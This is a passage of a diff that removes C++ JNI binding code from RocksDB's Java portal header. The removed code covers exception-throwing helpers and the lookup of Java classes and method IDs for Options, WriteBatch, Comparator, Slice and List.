-    if(rs != JNI_OK) {
-      // exception could not be thrown
-      std::cerr << "RocksDBExceptionJni::ThrowNew - Fatal: could not throw exception!" << std::endl;
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      return env->ExceptionCheck();
-    }
-
-    if(jstatus != nullptr) {
-      env->DeleteLocalRef(jstatus);
-    }
-    if(rocksdb_exception != nullptr) {
-      env->DeleteLocalRef(rocksdb_exception);
-    }
-
-    return true;
-  }
-
-  /**
-   * Create and throw a Java RocksDBException with the provided message
-   * and status
-   *
-   * If s.ok() == true, then this function will not throw any exception.
-   *
-   * @param env A pointer to the Java environment
-   * @param msg The message for the exception
-   * @param s The status for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const std::string& msg, const Status& s) {
-    assert(!s.ok());
-    if (s.ok()) {
-      return false;
-    }
-
-    // get the RocksDBException class
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "RocksDBExceptionJni::ThrowNew/class - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the constructor of org.rocksdb.RocksDBException
-    jmethodID mid =
-        env->GetMethodID(jclazz, "<init>", "(Ljava/lang/String;Lorg/rocksdb/Status;)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      std::cerr << "RocksDBExceptionJni::ThrowNew/cstr - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    jstring jmsg = env->NewStringUTF(msg.c_str());
-    if(jmsg == nullptr) {
-      // exception thrown: OutOfMemoryError
-      std::cerr << "RocksDBExceptionJni::ThrowNew/msg - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the Java status object
-    jobject jstatus = StatusJni::construct(env, s);
-    if(jstatus == nullptr) {
-      // exception occcurred
-      std::cerr << "RocksDBExceptionJni::ThrowNew/StatusJni - Error: unexpected exception!" << std::endl;
-      if(jmsg != nullptr) {
-        env->DeleteLocalRef(jmsg);
-      }
-      return env->ExceptionCheck();
-    }
-
-    // construct the RocksDBException
-    jthrowable rocksdb_exception = reinterpret_cast<jthrowable>(env->NewObject(jclazz, mid, jmsg, jstatus));
-    if(env->ExceptionCheck()) {
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(jmsg != nullptr) {
-        env->DeleteLocalRef(jmsg);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      std::cerr << "RocksDBExceptionJni::ThrowNew/NewObject - Error: unexpected exception!" << std::endl;
-      return true;
-    }
-
-    // throw the RocksDBException
-    const jint rs = env->Throw(rocksdb_exception);
-    if(rs != JNI_OK) {
-      // exception could not be thrown
-      std::cerr << "RocksDBExceptionJni::ThrowNew - Fatal: could not throw exception!" << std::endl;
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(jmsg != nullptr) {
-        env->DeleteLocalRef(jmsg);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      return env->ExceptionCheck();
-    }
-
-    if(jstatus != nullptr) {
-      env->DeleteLocalRef(jstatus);
-    }
-    if(jmsg != nullptr) {
-      env->DeleteLocalRef(jmsg);
-    }
-    if(rocksdb_exception != nullptr) {
-      env->DeleteLocalRef(rocksdb_exception);
-    }
-
-    return true;
-  }
-};
-
-// The portal class for java.lang.IllegalArgumentException
-class IllegalArgumentExceptionJni :
-    public JavaException<IllegalArgumentExceptionJni> {
- public:
-  /**
-   * Get the Java Class java.lang.IllegalArgumentException
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaException::getJClass(env, "java/lang/IllegalArgumentException");
-  }
-
-  /**
-   * Create and throw a Java IllegalArgumentException with the provided status
-   *
-   * If s.ok() == true, then this function will not throw any exception.
-   *
-   * @param env A pointer to the Java environment
-   * @param s The status for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const Status& s) {
-    assert(!s.ok());
-    if (s.ok()) {
-      return false;
-    }
-
-    // get the IllegalArgumentException class
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "IllegalArgumentExceptionJni::ThrowNew/class - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    return JavaException::ThrowNew(env, s.ToString());
-  }
-};
-
-
-// The portal class for org.rocksdb.Options
-class OptionsJni : public RocksDBNativeClass<
-    rocksdb::Options*, OptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Options
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Options");
-  }
-};
-
-// The portal class for org.rocksdb.DBOptions
-class DBOptionsJni : public RocksDBNativeClass<
-    rocksdb::DBOptions*, DBOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.DBOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/DBOptions");
-  }
-};
-
-class ColumnFamilyDescriptorJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ColumnFamilyDescriptor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/ColumnFamilyDescriptor");
-  }
-
-  /**
-   * Get the Java Method: ColumnFamilyDescriptor#columnFamilyName
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getColumnFamilyNameMethod(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "columnFamilyName", "()[B");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: ColumnFamilyDescriptor#columnFamilyOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getColumnFamilyOptionsMethod(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "columnFamilyOptions",
-            "()Lorg/rocksdb/ColumnFamilyOptions;");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.ColumnFamilyOptions
-class ColumnFamilyOptionsJni : public RocksDBNativeClass<
-    rocksdb::ColumnFamilyOptions*, ColumnFamilyOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ColumnFamilyOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/ColumnFamilyOptions");
-  }
-};
-
-// The portal class for org.rocksdb.WriteOptions
-class WriteOptionsJni : public RocksDBNativeClass<
-    rocksdb::WriteOptions*, WriteOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/WriteOptions");
-  }
-};
-
-// The portal class for org.rocksdb.ReadOptions
-class ReadOptionsJni : public RocksDBNativeClass<
-    rocksdb::ReadOptions*, ReadOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ReadOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/ReadOptions");
-  }
-};
-
-// The portal class for org.rocksdb.WriteBatch
-class WriteBatchJni : public RocksDBNativeClass<
-    rocksdb::WriteBatch*, WriteBatchJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteBatch
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/WriteBatch");
-  }
-};
-
-// The portal class for org.rocksdb.WriteBatch.Handler
-class WriteBatchHandlerJni : public RocksDBNativeClass<
-    const rocksdb::WriteBatchHandlerJniCallback*,
-    WriteBatchHandlerJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteBatch.Handler
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/WriteBatch$Handler");
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#put
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getPutMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "put", "([B[B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#merge
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getMergeMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "merge", "([B[B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#delete
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getDeleteMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "delete", "([B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#deleteRange
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getDeleteRangeMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if (jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "deleteRange", "([B[B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#logData
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getLogDataMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "logData", "([B)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: WriteBatch.Handler#shouldContinue
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getContinueMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "shouldContinue", "()Z");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.WriteBatchWithIndex
-class WriteBatchWithIndexJni : public RocksDBNativeClass<
-    rocksdb::WriteBatchWithIndex*, WriteBatchWithIndexJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.WriteBatchWithIndex
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/WriteBatchWithIndex");
-  }
-};
-
-// The portal class for org.rocksdb.HistogramData
-class HistogramDataJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class org.rocksdb.HistogramData
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "org/rocksdb/HistogramData");
-  }
-
-  /**
-   * Get the Java Method: HistogramData constructor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getConstructorMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "(DDDDD)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.BackupableDBOptions
-class BackupableDBOptionsJni : public RocksDBNativeClass<
-    rocksdb::BackupableDBOptions*, BackupableDBOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.BackupableDBOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/BackupableDBOptions");
-  }
-};
-
-// The portal class for org.rocksdb.BackupEngine
-class BackupEngineJni : public RocksDBNativeClass<
-    rocksdb::BackupEngine*, BackupEngineJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.BackupableEngine
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/BackupEngine");
-  }
-};
-
-// The portal class for org.rocksdb.RocksIterator
-class IteratorJni : public RocksDBNativeClass<
-    rocksdb::Iterator*, IteratorJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.RocksIterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/RocksIterator");
-  }
-};
-
-// The portal class for org.rocksdb.Filter
-class FilterJni : public RocksDBNativeClass<
-    std::shared_ptr<rocksdb::FilterPolicy>*, FilterJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Filter
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Filter");
-  }
-};
-
-// The portal class for org.rocksdb.ColumnFamilyHandle
-class ColumnFamilyHandleJni : public RocksDBNativeClass<
-    rocksdb::ColumnFamilyHandle*, ColumnFamilyHandleJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ColumnFamilyHandle
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/ColumnFamilyHandle");
-  }
-};
-
-// The portal class for org.rocksdb.FlushOptions
-class FlushOptionsJni : public RocksDBNativeClass<
-    rocksdb::FlushOptions*, FlushOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.FlushOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/FlushOptions");
-  }
-};
-
-// The portal class for org.rocksdb.ComparatorOptions
-class ComparatorOptionsJni : public RocksDBNativeClass<
-    rocksdb::ComparatorJniCallbackOptions*, ComparatorOptionsJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.ComparatorOptions
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/ComparatorOptions");
-  }
-};
-
-// The portal class for org.rocksdb.AbstractComparator
-class AbstractComparatorJni : public RocksDBNativeClass<
-    const rocksdb::BaseComparatorJniCallback*,
-    AbstractComparatorJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.AbstractComparator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env,
-        "org/rocksdb/AbstractComparator");
-  }
-
-  /**
-   * Get the Java Method: Comparator#name
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getNameMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "name", "()Ljava/lang/String;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Comparator#compare
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getCompareMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "compare",
-            "(Lorg/rocksdb/AbstractSlice;Lorg/rocksdb/AbstractSlice;)I");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Comparator#findShortestSeparator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getFindShortestSeparatorMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "findShortestSeparator",
-            "(Ljava/lang/String;Lorg/rocksdb/AbstractSlice;)Ljava/lang/String;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Comparator#findShortSuccessor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getFindShortSuccessorMethodId(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jclazz, "findShortSuccessor",
-            "(Ljava/lang/String;)Ljava/lang/String;");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for org.rocksdb.AbstractSlice
-class AbstractSliceJni : public NativeRocksMutableObject<
-    const rocksdb::Slice*, AbstractSliceJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.AbstractSlice
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/AbstractSlice");
-  }
-};
-
-// The portal class for org.rocksdb.Slice
-class SliceJni : public NativeRocksMutableObject<
-    const rocksdb::Slice*, AbstractSliceJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Slice
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Slice");
-  }
-
-  /**
-   * Constructs a Slice object
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return A reference to a Java Slice object, or a nullptr if an
-   *     exception occurs
-   */
-  static jobject construct0(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "()V");
-    if(mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-    
-    jobject jslice = env->NewObject(jclazz, mid);
-    if(env->ExceptionCheck()) {
-      return nullptr;
-    }
-
-    return jslice;
-  }
-};
-
-// The portal class for org.rocksdb.DirectSlice
-class DirectSliceJni : public NativeRocksMutableObject<
-    const rocksdb::Slice*, AbstractSliceJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.DirectSlice
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/DirectSlice");
-  }
-
-  /**
-   * Constructs a DirectSlice object
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return A reference to a Java DirectSlice object, or a nullptr if an
-   *     exception occurs
-   */
-  static jobject construct0(JNIEnv* env) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jclazz, "<init>", "()V");
-    if(mid == nullptr) {
-      // exception occurred accessing method
-      return nullptr;
-    }
-
-    jobject jdirect_slice = env->NewObject(jclazz, mid);
-    if(env->ExceptionCheck()) {
-      return nullptr;
-    }
-
-    return jdirect_slice;
-  }
-};
-
-// The portal class for java.util.List
-class ListJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class java.util.List
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getListClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/util/List");
-  }
-
-  /**
-   * Get the Java Class java.util.ArrayList
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getArrayListClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/util/ArrayList");
-  }
-
-  /**
-   * Get the Java Class java.util.Iterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getIteratorClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/util/Iterator");
-  }
-
-  /**
-   * Get the Java Method: List#iterator
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getIteratorMethod(JNIEnv* env) {
-    jclass jlist_clazz = getListClass(env);
-    if(jlist_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jlist_clazz, "iterator", "()Ljava/util/Iterator;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Iterator#hasNext
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getHasNextMethod(JNIEnv* env) {
-    jclass jiterator_clazz = getIteratorClass(env);
-    if(jiterator_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(jiterator_clazz, "hasNext", "()Z");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: Iterator#next
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getNextMethod(JNIEnv* env) {
-    jclass jiterator_clazz = getIteratorClass(env);
-    if(jiterator_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jiterator_clazz, "next", "()Ljava/lang/Object;");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: ArrayList constructor
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getArrayListConstructorMethodId(JNIEnv* env) {
-    jclass jarray_list_clazz = getArrayListClass(env);
-    if(jarray_list_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-    static jmethodID mid =
-        env->GetMethodID(jarray_list_clazz, "<init>", "(I)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Get the Java Method: List#add
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Method ID or nullptr if the class or method id could not
-   *     be retieved
-   */
-  static jmethodID getListAddMethodId(JNIEnv* env) {
-    jclass jlist_clazz = getListClass(env);
-    if(jlist_clazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    static jmethodID mid =
-        env->GetMethodID(jlist_clazz, "add", "(Ljava/lang/Object;)Z");
-    assert(mid != nullptr);
-    return mid;
-  }
-};
-
-// The portal class for java.lang.Byte
-class ByteJni : public JavaClass {
- public:
-  /**
-   * Get the Java Class java.lang.Byte
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaClass::getJClass(env, "java/lang/Byte");
-  }
-
-  /**
-   * Get the Java Class byte[]
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
